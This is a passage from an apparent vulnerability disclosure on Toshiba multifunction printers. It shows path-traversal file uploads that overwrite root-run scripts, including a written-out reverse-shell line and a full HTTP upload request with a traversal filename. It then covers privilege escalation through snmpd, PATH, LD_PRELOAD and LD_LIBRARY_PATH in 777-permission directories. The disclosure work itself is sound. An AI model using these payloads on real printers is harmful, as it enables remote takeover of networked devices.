bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver  
-rwxrwxrwx 1 root root 7007 Mar 15 11:45  
/home/SYSROM_SRC/build/common/bin/networkservice/ldapserver  
bash-4.1# head /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver  
#!/bin/bash  
LDAP_STARTUP_STATUS=0;  
  
function stop() {  
echo "slapd is stopped"  
kill -SIGINT `pgrep slapd`  
check_stop_process  
}  
  
function start() {  
bash-4.1#  
  
After the execution of the HTTP request, the file has been modified.  
It now contains the malicious payload:  
  
bash-4.1# ls -la /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver  
-rw-rw-rw- 1 apache trusted 52 May 27 16:35  
/home/SYSROM_SRC/build/common/bin/networkservice/ldapserver  
bash-4.1# cat /home/SYSROM_SRC/build/common/bin/networkservice/ldapserver  
#!/bin/sh  
  
bash -i >& /dev/tcp/10.0.0.2/21 0>&1  
bash-4.1#  
  
Another exploitation of a different form is shown below, using the  
upload of drivers. It exploits the same vulnerability. The file  
`/home/SYSROM_SRC/sbin/malicious.program` will contain `test`:  
  
Upload of `/home/SYSROM_SRC/sbin/malicious.program`:  
  
POST /contentwebserver/upload HTTP/1.1  
Host: 10.0.0.1:8080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)  
Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;  
boundary=---------------------------8960912535828260861374302822  
Content-Length: 1813  
Origin: http://10.0.0.1:8080  
Connection: close  
Referer: http://10.0.0.1:8080/Administration/maintenance/uploadsoft/UnixList.html?v=1517352288ta&fileMode=2  
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;  
pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW;  
TopAccessURL=http%3A//10.0.0.1%3A8080/%3FMAIN%3DTOPACCESS;  
SessionID=Session_3e61919e-556b-4be7-8a18-91bb65a4752b; clicked=0;  
addrLastVisited=ADDRBK; IgnoreSessionTimeout=1;  
Session=10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee  
Upgrade-Insecure-Requests: 1  
  
-----------------------------8960912535828260861374302822  
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"  
  
frames[0].formSubmitCompleteUploadList  
-----------------------------8960912535828260861374302822  
Content-Disposition: form-data; name="DeviceInformationModel"  
  
<DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>aix.tar</File><name>Upload</name></source><destination><name>Unix-Filters</name></destination></Params></Move></Command></DeviceInformationModel>  
-----------------------------8960912535828260861374302822  
Content-Disposition: form-data; name="CsrfpId"  
  
10.0.0.2.cab8f72fb0d8c69e622235cfff9d3cee  
-----------------------------8960912535828260861374302822  
Content-Disposition: form-data;  
name="/./../../../../../home/SYSROM_SRC/sbin/malicious.program";  
filename="aix.tar"  
Content-Type: application/x-tar  
  
test  
  
-----------------------------8960912535828260861374302822  
Content-Disposition: form-data; name="hpux.tar"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------8960912535828260861374302822  
Content-Disposition: form-data; name="hpux64.tar"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------8960912535828260861374302822  
Content-Disposition: form-data; name="linux.tar"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------8960912535828260861374302822  
Content-Disposition: form-data; name="openunix.tar"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------8960912535828260861374302822  
Content-Disposition: form-data; name="solaris.tar"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------8960912535828260861374302822--  
  
And we can confirm this file has been uploaded on the printer:  
  
bash-4.1# ls -la /home/SYSROM_SRC/sbin/malicious.program  
-rw-rw-rw- 1 apache trusted 5 May 27 07:48  
/home/SYSROM_SRC/sbin/malicious.program  
bash-4.1#  
  
This vulnerability can be used to get Remote Code Executions using  
several different ways. Due to some weaknesses found in Toshiba  
printers, there are hundreds different ways to get Remote Code  
Execution. For example:  
  
* Upload of a malicious library defined in the LD_PRELOAD variable:  
* /ramdisk/al/libGetNameInfoInterface.so or  
/ramdisk/al/libGetAddtInfoInterface.so can be overwritten by a  
malicious library  
* Upload of a malicious library using the LD_LIBRARY_PATH variable -  
An attacker can upload malicious libraries inside:  
* /home/SYSROM_SRC/build/release/lib,  
* /mfp/lib,  
* /home/SYSROM_SRC/NoBuildItems/common/lib,  
* /home/SYSROM_SRC/build/thirdparty/plugins/platforminputcontexts/,  
* /home/SYSROM_SRC/build/release/lib.  
* Upload of a malicious program due to insecure permissions:  
* As shown in Local Privilege Escalation and Remote Code Execution  
using insecure permissions for 106 programs, a lot of programs running  
as root can be overwritten due to insecure permissions (777)  
* Upload a malicious Python program or a malicious Python library  
* Replace Bash scripts  
* ...  
  
An attacker with admin privileges can remotely compromise any Toshiba printer.  
  
An attacker with admin privileges can overwrite any insecure file  
(including programs running as root and Python code).  
  
  
  
## Details - Lack of privileges separation  
  
Toshiba printers do not implement privileges separation. An attacker  
compromising a program will be able to compromise the entire printer.  
  
For example, all the programs, except Apache, are running as root.  
  
Apache is not running as root but a Local Privilege Escalation can be  
achieved using one of these vulnerabilities:  
  
- - Local Privilege Escalation and Remote Code Execution using snmpd  
- - Local Privilege Escalation and Remote Code Execution using insecure PATH  
- - Local Privilege Escalation and Remote Code Execution using  
insecure LD_PRELOAD  
- - Local Privilege Escalation and Remote Code Execution using  
insecure LD_LIBRARY_PATH  
- - Local Privilege Escalation and Remote Code Execution using  
insecure permissions for 106 programs  
  
Listing of processes on the printer:  
  
bash-4.1# ps auxw  
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND  
root 1 0.0 0.0 1740 512 ? Ss 16:34 0:00 init [3]  
root 2 0.0 0.0 0 0 ? S 16:34 0:00 [kthreadd]  
root 3 0.0 0.0 0 0 ? S 16:34 0:00  
[ksoftirqd/0]  
[...]  
root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00  
/home/SYSROM_SRC/build/release/bin/slapd -h ldap://127.0.0.1 -f  
/home/SYSROM_SRC/build/release/etc/openldap/slapd.conf -d 1  
root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02  
/home/SYSROM_SRC/bin/mapper firstboot=0  
root 1482 0.0 0.0 26120 2628 ? Ss 16:34 0:00  
/usr/local/ebx/httpd_worker/bin/httpd_worker -f  
/encryption/al/network/config/httpd-prox.conf -k start  
apache 1486 0.0 0.1 1264444 3728 ? Sl 16:34 0:00  
/usr/local/ebx/httpd_worker/bin/httpd_worker -f  
/encryption/al/network/config/httpd-prox.conf -k start  
[...]  
root 1757 0.0 0.2 34388 8176 ? S 16:34 0:00  
./cipollproc  
root 1758 0.0 0.2 34432 8180 ? S< 16:34 0:00  
./ciprioritymanager  
root 1785 0.3 1.9 815004 59476 ? Sl 16:34 0:51  
./ebx_dl 1539 1537 1540 1 2 3 -T8  
root 1786 0.0 0.5 101584 15612 ? S 16:34 0:00  
./de_ipfax 1539 1537 1540 1 2 3 -T8  
root 1803 0.0 0.3 38908 9448 ? S 16:34 0:00  
./alnfcplugin  
root 1846 0.0 0.0 15544 2788 ? S 16:34 0:00  
/home/SYSROM_SRC/bin/eBXDebugLogUtility  
root 1850 0.0 0.0 1744 500 ttyS0 Ss+ 16:34 0:00  
/sbin/getty 115200 ttyS0  
root 1864 0.0 0.4 46528 13060 ? S 16:34 0:00  
./alfilestoragem -T8  
root 1866 0.0 0.6 60164 18036 ? S 16:34 0:00 ./alusermgr  
root 1867 0.0 0.4 44120 14156 ? S 16:34 0:00  
./allicensemgmt  
root 1868 0.0 0.6 56792 18680 ? Sl 16:34 0:00  
./aldeviceserviceplugin  
root 1869 0.0 1.4 84708 42192 ? S 16:34 0:03  
./aldeviceconfigplugin  
root 1870 0.0 0.6 60856 20516 ? S 16:34 0:01  
./aluserAuthMgr  
root 1871 0.0 0.3 41912 11224 ? S 16:34 0:00 ./algrpmgr  
root 1872 0.0 0.4 43616 13080 ? S 16:34 0:00 ./alrolemgr  
root 1873 0.0 0.5 54708 14972 ? Sl 16:34 0:05  
./alrestrictionmode  
root 1874 0.0 0.5 61692 15364 ? Sl 16:34 0:00  
./alsecurityconfiguration  
root 1875 0.0 0.3 41408 11008 ? S 16:34 0:00  
./alintegritychkmgr  
root 1876 0.3 3.6 482584 108060 ? Sl 16:34 0:43  
./alUiFrameWork legacy -S ramdisk  
root 1877 0.0 0.9 92276 26968 ? Sl 16:34 0:01  
./alpanel panel 49 Controller/Settings/autoClear  
Controller/Information/Locale -T4  
root 1878 0.0 0.4 60888 14588 ? S 16:34 0:00  
./aljobtemplatemgr  
root 1879 0.0 0.3 42492 11204 ? S 16:34 0:00  
./alLogRetriever -T8  
root 1880 0.0 0.4 49340 14248 ? S 16:34 0:00  
./alExportImport -T8  
root 1881 0.0 0.4 57852 14596 ? S 16:34 0:00  
./aleFilingmgr -T8  
root 1882 0.0 0.4 60244 13020 ? Sl 16:34 0:00  
./alpresentationresourcemgr -T8  
root 1883 0.0 0.2 35036 8340 ? S 16:34 0:00  
./alServiceUIPlugin  
root 1884 0.0 0.3 45624 10220 ? Sl 16:34 0:00  
./alPanelUIMessageHandler -S ramdisk  
root 1885 0.0 0.3 42016 11916 ? S 16:34 0:00  
./alusbmscapplication  
root 1886 0.0 0.4 70124 12236 ? Sl 16:34 0:00  
./alViewPlugin  
root 1887 0.0 0.4 83200 12652 ? Sl 16:34 0:00  
./alsharedprintDp -T8  
root 1888 0.0 0.7 62028 22420 ? S 16:34 0:06  
./alnsm -d9 -m00 -T5  
root 1890 0.0 0.5 128920 16292 ? Sl 16:34 0:00  
./aljobcontroller -T8  
root 1891 0.0 0.4 118216 12728 ? Sl 16:34 0:00  
./alprintmn -T8  
root 1892 0.0 0.3 49888 11220 ? Sl 16:34 0:00  
./alreportsmsgr  
root 1893 0.0 0.5 72764 17720 ? Sl 16:34 0:00  
./alreportmanager  
root 1922 0.0 0.3 46056 11236 ? S 16:34 0:00  
./almailboxapplication  
root 1923 0.0 0.4 44204 13528 ? S 16:34 0:00  
./alsoftwareupdateclient -T8  
root 1974 0.0 0.5 56496 15560 ? S 16:34 0:00  
./alifaxreceive -T8  
root 1975 0.0 0.4 47184 14844 ? S 16:34 0:00  
./almaintenanceplugin -T6  
root 1976 0.0 0.3 41416 11312 ? S 16:34 0:00  
./alpdlfiltermanager  
root 1977 0.0 0.4 51736 14524 ? S 16:34 0:00  
./alCloning -T8  
root 1978 0.0 0.3 43528 9412 ? Sl 16:34 0:00  
./alPanelStartLEDHandler  
root 1979 0.0 0.3 39964 11504 ? S 16:34 0:00  
./alhomedatamgr  
root 1980 0.0 0.6 47532 18748 ? S 16:34 0:00 ./sim -T8  
root 1981 0.0 0.7 92856 23600 ? Sl 16:34 0:01  
./informationservice -T8  
root 1982 0.0 0.2 34624 8476 ? S 16:34 0:00  
./sljobmanagement -T8  
root 1985 0.0 0.7 59792 22588 ? Sl 16:34 0:00  
./notificationservice 1284 -T8  
root 1986 0.0 0.9 87936 28716 ? Sl 16:34 0:03 ./wfpc -T8  
root 1987 0.0 0.3 35524 9156 ? S 16:34 0:00 ./armn -T8  
root 2205 0.0 0.4 59596 12808 ? Ss 16:35 0:00 ./wfpc -T8  
root 2208 0.0 0.3 59144 11220 ? Ss 16:35 0:00 ./wfpc -T8  
root 2327 0.0 0.4 55020 13452 ? S 16:35 0:00  
./alAddressBookMgr  
root 2328 0.0 0.5 72396 15208 ? Sl 16:35 0:00  
./alaccountmgr  
root 2426 0.0 0.3 46192 10496 ? Sl 16:35 0:00  
./agent_scan 1282 1 -T8  
root 2428 0.0 0.3 44272 9844 ? Sl 16:35 0:00  
./agent_faxreceive 1282 2 -T8  
root 2430 0.0 0.6 450116 19668 ? Sl 16:35 0:00  
./agent_rip 1282 6 -T8  
root 2432 0.0 0.3 47100 10260 ? Sl 16:35 0:00  
./agent_print 1282 15 -T8  
root 2433 0.0 0.3 44316 9816 ? Sl 16:35 0:00  
./agent_faxtransmit 1282 16 -T8  
root 2434 0.0 0.3 44296 9800 ? Sl 16:35 0:00  
./agent_ipfaxtransmit 1282 31 -T8  
root 2435 0.0 0.3 44268 9796 ? Sl 16:35 0:00  
./agent_ipfaxreceive 1282 32 -T8  
root 2515 0.0 0.4 54636 13444 ? Sl 16:35 0:00 ./alulm  
root 2516 0.0 0.3 249732 9260 ? Sl 16:35 0:00  
./alcbamanager -S ramdisk  
root 2614 0.0 0.5 183976 17564 ? Sl 16:35 0:00  
./alappmanager  
root 2870 0.0 0.4 54968 14848 ? Sl 16:35 0:00  
./alLogmanager  
root 2871 0.0 0.4 46088 13440 ? S 16:35 0:00  
./alhddbackuprestore  
[...]  
root 3784 0.0 0.4 45704 12760 ? S 16:35 0:00  
/home/SYSROM_SRC/build/release/bin/alftpprintd  
root 3828 0.0 0.0 15516 2424 ? S 16:35 0:00  
/home/SYSROM_SRC/build/release/bin/vsftpd -enableprinting  
root 3860 0.1 2.3 201372 70908 ? Sl 16:35 0:25  
python /home/SYSROM_SRC/build/release/bin/sapphost.py  
10000000-0000-0000-0000-500000000000  
root 3935 0.0 0.4 218132 13644 ? Sl 16:35 0:00  
/home/SYSROM_SRC/build/release/bin/alhp9100 -f  
/encryption/al/network/config/hp9100.conf  
root 3970 0.1 1.6 144908 48860 ? Sl 16:35 0:24  
python /home/SYSROM_SRC/build/release/bin/sapphost.py  
10000000-0000-0000-0000-500000000001  
root 3992 0.0 0.2 33948 8128 ? S 16:35 0:00  
/home/SYSROM_SRC/build/release/bin/snmp_watchdog  
root 4025 0.0 0.2 34236 8920 ? S 16:35 0:00  
/home/SYSROM_SRC/bin/dnsValidateDaemon  
[...]  
  
The printer does not implement separation of privileges.  
  
A vulnerability found inside one of the multiple components in the  
printer is enough to completely compromise the security of printer.  
  
  
  
## Details - Local Privilege Escalation and Remote Code Execution using snmpd  
  
Toshiba printers are vulnerable to a Local Privilege Escalation  
vulnerability because of an insecure library defined inside the  
configuration of snmpd. This Local Privilege Escalation can be also  
exploited as a Remote Code Execution by uploading a malicious library.  
  
The snmpd configuration file located at  
`/encryption/al/network/config/snmpd.conf` contains the loading of an  
external and Toshiba-specific library. The code contained inside this  
library will be executed as root (as snmpd is running as root).  
  
Content of `/encryption/al/network/config/snmpd.conf`:  
  
dlmod mibs_impl  
/home/SYSROM_SRC/lib/libalmibs_impl.so  
  
This file is a symbolic link to the  
`/home/SYSROM_SRC/lib/libalmibs_impl.so.0` library.  
  
The `/home/SYSROM_SRC/lib/libalmibs_impl.so.0` file has incorrect  
permissions, allowing any local attacker or any remote attacker  
exploiting the Pre-authenticated Remote Code Execution as root or  
apache and multiple Local Privilege Escalations vulnerability to  
replace this file with a malicious library.  
  
bash-4.1# ls -la /home/SYSROM_SRC/lib/libalmibs_impl.so*  
lrwxrwxrwx 1 root root 19 Mar 14 16:27  
/home/SYSROM_SRC/lib/libalmibs_impl.so -> libalmibs_impl.so.0  
-rwxrwxrwx 1 root root 5239499 Dec 6 03:28  
/home/SYSROM_SRC/lib/libalmibs_impl.so.0  
bash-4.1#  
  
This file will be loaded when snmpd starts. The snmpd program starts  
during the boot of the printer and is automatically restarted when it  
crashes.  
  
It is possible to crash the remote snmpd server using the  
Pre-authenticated Remote Code Execution as root vulnerability to force  
the restart of the snmpd daemon, load the malicious library and  
compromise the printer.  
  
An attacker can remotely compromise any Toshiba printer.  
  
  
  
## Details - Local Privilege Escalation and Remote Code Execution  
using insecure PATH  
  
Toshiba printers are vulnerable to a Local Privilege Escalation  
vulnerability because of an insecure PATH variable. This Local  
Privilege Escalation can be also exploited as a Remote Code Execution  
by uploading a malicious program using the Pre-authenticated Remote  
Code Execution as root or apache and multiple Local Privilege  
Escalations vulnerability.  
  
It was observed that the Toshiba printers are configured with an  
insecure `$PATH` variable:  
  
bash-4.1# echo $PATH  
/home/SYSROM_SRC/build/release/bin:/home/SYSROM_SRC/build/release/sbin:/home/SYSROM_SRC/build/release/bin:  
/home/SYSROM_SRC/build/release/sbin:/home/SYSROM_SRC/build/release/bin:/home/SYSROM_SRC/build/release/sbin:  
/bin:/usr/bin:/sbin:/usr/sbin:/sbin:/bin/:/usr/bin/:/usr/sbin:/sbin:/bin/:/usr/bin/:/usr/sbin:/sbin:/bin/:/usr/bin/:/usr/sbin  
bash-4.1#  
  
The `$PATH` variable contains several directories with insecure  
permissions (777) allowing any attacker to plant malicious programs  
that will be then executed instead of regular programs:  
  
- - `/home/SYSROM_SRC/build/release/bin`  
- - `/home/SYSROM_SRC/build/release/sbin`  
  
These 2 directories are specified multiple times and are configured  
with the 777 permissions:  
  
Insecure permissions of `/home/SYSROM_SRC/build/release/bin` and  
`/home/SYSROM_SRC/build/release`:  
  
bash-4.1# ls -la /home/SYSROM_SRC/bin  
lrwxrwxrwx 1 root trusted 17 Mar 14 16:34 /home/SYSROM_SRC/bin ->  
build/release/bin  
bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin  
total 176508  
drwxrwxrwx 2 root root 36864 Mar 15 16:12 .  
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..  
lrwxrwxrwx 1 root root 25 Mar 14 16:27 2to3 ->  
../../thirdparty/bin/2to3  
lrwxrwxrwx 1 root root 29 Mar 14 16:27 2to3-3.5 ->  
../../thirdparty/bin/2to3-3.5  
-rwxrwxrwx 1 root root 120381 Dec 6 01:56 ALABAMA_Large.ico  
-rwxrwxrwx 1 root root 25214 Dec 6 01:56 ALABAMA_Small.ico  
-rwxrwxrwx 1 root root 143884 Dec 6 01:56 ALABAMA_f_Large.ico  
-rwxrwxrwx 1 root root 25214 Dec 6 01:56 ALABAMA_f_Small.ico  
lrwxrwxrwx 1 root root 39 Mar 14 16:27  
AppLicenseDataBase -> ../../thirdparty/bin/AppLicenseDataBase  
...  
  
Insecure permissions of `/home/SYSROM_SRC/build/release/sbin` and  
`/home/SYSROM_SRC/build/release`:  
  
bash-4.1# ls -la /home/SYSROM_SRC/sbin  
lrwxrwxrwx 1 root root 18 Mar 14 16:34 /home/SYSROM_SRC/sbin ->  
build/release/sbin  
bash-4.1# ls -la /home/SYSROM_SRC/build/release/sbin  
total 608  
drwxrwxrwx 2 root root 4096 Dec 6 01:40 .  
drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..  
-rwxrwxrwx 1 root root 4467 Dec 6 01:40 CheckAndRemovePerms.sh  
lrwxrwxrwx 1 root root 26 Mar 14 16:27 afpd ->  
../../thirdparty/sbin/afpd  
lrwxrwxrwx 1 root root 30 Mar 14 16:27 arpaname ->  
../../thirdparty/sbin/arpaname  
lrwxrwxrwx 1 root root 28 Mar 14 16:27 atalkd ->  
../../thirdparty/sbin/atalkd  
lrwxrwxrwx 1 root root 30 Mar 14 16:27 cnid_dbd ->  
../../thirdparty/sbin/cnid_dbd  
lrwxrwxrwx 1 root root 32 Mar 14 16:27 cnid_metad ->  
../../thirdparty/sbin/cnid_metad  
lrwxrwxrwx 1 root root 34 Mar 14 16:27 ddns-confgen ->  
../../thirdparty/sbin/ddns-confgen  
...  
  
On a side note, the `/home/SYSROM_SRC` directory is highly insecure  
with incorrect permissions used everywhere:  
  
bash-4.1# ls -la /home/SYSROM_SRC  
total 52  
drwxr-xr-x 9 root root 4096 Mar 14 16:34 .  
drwxr-xr-x 4 root root 4096 Mar 14 16:28 ..  
lrwxrwxrwx 1 root root 30 Mar 14 16:28 CBAHttpServer ->  
/registration/al/CBAHttpServer  
lrwxrwxrwx 1 root root 20 Mar 14 16:27 HDBROOT -> /home/SYSROM_SRC/tmp  
drwxrwxrwx 7 root root 4096 Dec 6 00:46 NoBuildItems  
lrwxrwxrwx 1 root root 28 Mar 14 16:28 Resources ->  
/registration/data/Resources  
lrwxrwxrwx 1 root root 32 Mar 14 16:28 Resources_eBN ->  
/registration/data/Resources_eBN  
-rwxr-xr-x 1 root root 5614 Mar 14 16:28 Startup.sh  
lrwxrwxrwx 1 root root 40 Apr 6 2016 TopAccess ->  
/home/SYSROM_SRC/build/release/TopAccess  
lrwxrwxrwx 1 root root 28 Mar 14 16:28 TopAccessPy ->  
/registration/al/TopAccessPy  
lrwxrwxrwx 1 root root 23 Mar 14 16:28 WebAPI ->  
/registration/al/WebAPI  
lrwxrwxrwx 1 root root 25 Mar 14 16:28 WebPanel ->  
/registration/al/WebPanel  
lrwxrwxrwx 1 root trusted 17 Mar 14 16:34 bin -> build/release/bin  
drwxr-xr-x 5 root root 4096 Apr 6 2016 build  
drwxrwxrwx 2 root root 4096 Dec 6 01:13 config  
drwxrwxrwx 3 root root 4096 Mar 14 16:28 data  
lrwxrwxrwx 1 root root 17 Mar 14 16:34 etc -> build/release/etc  
-rwxr-xr-x 1 root root 1075 Mar 14 16:27 install_rip_ram.sh  
drwxrwxrwx 4 root root 4096 Mar 14 16:34 jobdata  
lrwxrwxrwx 1 root trusted 17 Mar 14 16:34 lib -> build/release/lib  
drwxrwxrwx 2 root root 4096 Dec 6 04:48 logs  
lrwxrwxrwx 1 root root 18 Mar 14 16:34 sbin -> build/release/sbin  
-rwxrwxrwx 1 root root 3492 Dec 8 2017 setenv  
lrwxrwxrwx 1 root root 19 Mar 14 16:34 share -> build/release/share  
drwxr-xr-x 3 root root 4096 Dec 6 04:48 var  
bash-4.1#  
  
An attacker can place any malicious program inside  
`/home/SYSROM_SRC/build/release/bin` or  
`/home/SYSROM_SRC/build/release/sbin` and they will be executed before  
legit programs that are stored in the regular UNIX directories  
(`/bin`, `/usr/bin`, `/sbin`, `/usr/sbin`).  
  
An attacker can remotely compromise any Toshiba printer.  
  
  
  
## Details - Local Privilege Escalation and Remote Code Execution  
using insecure LD_PRELOAD  
  
Toshiba printers are vulnerable to a Local Privilege Escalation  
vulnerability because of an insecure LD_PRELOAD variable. This Local  
Privilege Escalation can be also exploited as a Remote Code Execution  
by uploading a malicious library using the Pre-authenticated Remote  
Code Execution as root or apache and multiple Local Privilege  
Escalations vulnerability.  
  
Toshiba printers are configured with an insecure `LD_PRELOAD` variable:  
  
bash-4.1# printenv | grep LD_PRELOAD  
LD_PRELOAD=/ramdisk/al/libGetNameInfoInterface.so:/ramdisk/al/libGetAddtInfoInterface.so:  
bash-4.1#  
  
The `$LD_PRELOAD` variable contains 2 libraries with insecure  
permissions (777) allowing any attacker to replace these libraries  
with malicious libraries that will be then executed:  
  
- - `/ramdisk/al/libGetNameInfoInterface.so`  
- - `/ramdisk/al/libGetAddtInfoInterface.so`  
  
Checking the permissions of libraries defined in LD_PRELOAD:  
  
bash-4.1# ls -la /ramdisk/al/libGetNameInfoInterface.so  
-rwxrwxrwx 1 root root 70813 Dec 6 02:02  
/ramdisk/al/libGetNameInfoInterface.so  
bash-4.1# s -la /ramdisk/al/libGetAddtInfoInterface.so  
-rwxrwxrwx 1 root root 87311 Dec 6 02:02  
/ramdisk/al/libGetAddtInfoInterface.so  
bash-4.1#  
  
We can confirm these 2 libraries are loaded within programs inside the printers.  
  
Using `/proc/$PID/maps`, we can list the libraries loaded inside the  
programs: these libraries are loaded inside all the programs running  
as root and apache in the printers:  
  
bash-4.1# cd /proc && for i in */; do cat $i/cmdline && echo &&  
grep ramdisk $i/maps;done  
/home/SYSROM_SRC/build/release/bin/nqnd  
77788000-77797000 r-xp 00000000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
77797000-77799000 rw-p 0000e000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
77799000-777a4000 r-xp 00000000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
777a4000-777a6000 rw-p 0000a000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
/home/SYSROM_SRC/build/release/bin/nqcs  
7776d000-7777c000 r-xp 00000000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
7777c000-7777e000 rw-p 0000e000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
7777e000-77789000 r-xp 00000000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
77789000-7778b000 rw-p 0000a000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
[...]  
/usr/local/ebx/bin/httpd -f  
/encryption/al/network/config/httpd.conf -k start  
777b5000-777c4000 r-xp 00000000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
777c4000-777c6000 rw-p 0000e000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
777c7000-777d2000 r-xp 00000000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
777d2000-777d4000 rw-p 0000a000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
/usr/local/ebx/bin/httpd -f  
/encryption/al/network/config/httpd.conf -k start  
777b5000-777c4000 r-xp 00000000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
777c4000-777c6000 rw-p 0000e000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
777c7000-777d2000 r-xp 00000000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
777d2000-777d4000 rw-p 0000a000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
[...]  
./alusermgr  
776f6000-77705000 r-xp 00000000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
77705000-77707000 rw-p 0000e000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
77707000-77712000 r-xp 00000000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
77712000-77714000 rw-p 0000a000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
./allicensemgmt  
777dc000-777eb000 r-xp 00000000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
777eb000-777ed000 rw-p 0000e000 00:0d 10712  
/ramdisk/al/libGetAddtInfoInterface.so  
777ed000-777f8000 r-xp 00000000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
777f8000-777fa000 rw-p 0000a000 00:0d 7014  
/ramdisk/al/libGetNameInfoInterface.so  
[...]  
  
An attacker can remotely compromise any Toshiba printer.  
  
  
  
## Details - Local Privilege Escalation and Remote Code Execution  
using insecure LD_LIBRARY_PATH  
  
Toshiba printers are vulnerable to a Local Privilege Escalation  
vulnerability because of an insecure LD_LIBRARY_PATH variable. This  
Local Privilege Escalation can be also exploited as a Remote Code  
Execution by uploading a malicious library using the Pre-authenticated  
Remote Code Execution as root or apache and multiple Local Privilege  
Escalations vulnerability.  
  
Toshiba printers are configured with an insecure `$LD_LIBRARY_PATH` variable:  
  
bash-4.1# printenv|grep LD_LIBRARY_PATH  
LD_LIBRARY_PATH=/home/SYSROM_SRC/build/release/lib:/mfp/lib:/home/SYSROM_SRC/NoBuildItems/common/lib:/home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/:/home/SYSROM_SRC/build/release/lib  
bash-4.1#  
  
The `$LD_LIBRARY_PATH` variable contains 4 directories insecure  
permissions (777) allowing any attacker to replace these libraries  
with malicious libraries that will be then executed:  
  
- - `/home/SYSROM_SRC/build/release/lib`  
- - `/mfp/lib`  
- - `/home/SYSROM_SRC/NoBuildItems/common/lib`  
- - `/home/SYSROM_SRC/build/thirdparty//plugins//platforminputcontexts/`  
  
We can confirm these directories have insecure permissions and/or the  
files stored inside these directories have insecure permissions as  
shown below:  
  
Insecure permissions of `/home/SYSROM_SRC/build/release/lib`:  
  
bash-4.1# ls -la /home/SYSROM_SRC/build/release/lib  
total 391144  
drwxrwxrwx 4 root root 65536 May 27 16:28 .  
drwxrwxrwx 19 root root 4096 May 27 16:28 ..  
lrwxrwxrwx 1 root root 38 Apr 6 2016 ImageMagick-6.3.3 ->  
../../thirdparty/lib/ImageMagick-6.3.3  
lrwxrwxrwx 1 root root 38 Mar 14 16:27 ImageMagick-6.7.5 ->  
../../thirdparty/lib/ImageMagick-6.7.5  
lrwxrwxrwx 1 root root 15 Mar 14 16:27 al8021XNMO.so ->  
al8021XNMO.so.0  
-rwxrwxrwx 1 root root 223011 Dec 6 01:58 al8021XNMO.so.0  
lrwxrwxrwx 1 root root 14 Mar 14 16:27 alDDNSNMO.so -> alDDNSNMO.so.0  
-rwxrwxrwx 1 root root 171442 Dec 6 01:59 alDDNSNMO.so.0  
lrwxrwxrwx 1 root root 13 Mar 14 16:27 alDNSNMO.so -> alDNSNMO.so.0  
[...]  
  
Insecure permissions of `/mfp/lib`:  
  
bash-4.1# ls -la /mfp/lib  
total 344308  
drwxr-xr-x 2 root root 12288 May 27 16:28 .  
drwxr-xr-x 8 root root 4096 May 27 16:28 ..  
-rwxrwxrwx 1 root root 75 Jan 11 2013 DirectoryCopy.txt  
-rwxrwxrwx 1 root root 203 Jun 29 2017 SharedFiles.ini  
-rwxrwxrwx 1 root root 6210326 Jun 9 2022 laser.so  
-rwxrwxrwx 1 root root 11386849 Jun 9 2022 laserc1x.so  
-rwxrwxrwx 1 root root 298388 Dec 17 2017 libAbbyyZlib.so  
-rwxrwxrwx 1 root root 1518996 Dec 17 2017 libBarcode.so  
-rwxrwxrwx 1 root root 1045032 Dec 17 2017  
libBusinessCard.Analyser.so  
[...]  
  
Insecure permissions of `/home/SYSROM_SRC/NoBuildItems/common/lib`:  
  
bash-4.1# ls -la /home/SYSROM_SRC/NoBuildItems/common/lib  
total 49580  
drwxrwxrwx 2 root root 4096 May 27 16:27 .  
drwxrwxrwx 4 root root 4096 Dec 6 00:21 ..  
-rwxrwxrwx 1 root root 624082 Dec 6 04:53 libCryptolib.so  
-rwxrwxrwx 1 root root 624082 Dec 6 04:53 libCryptolib.so.0  
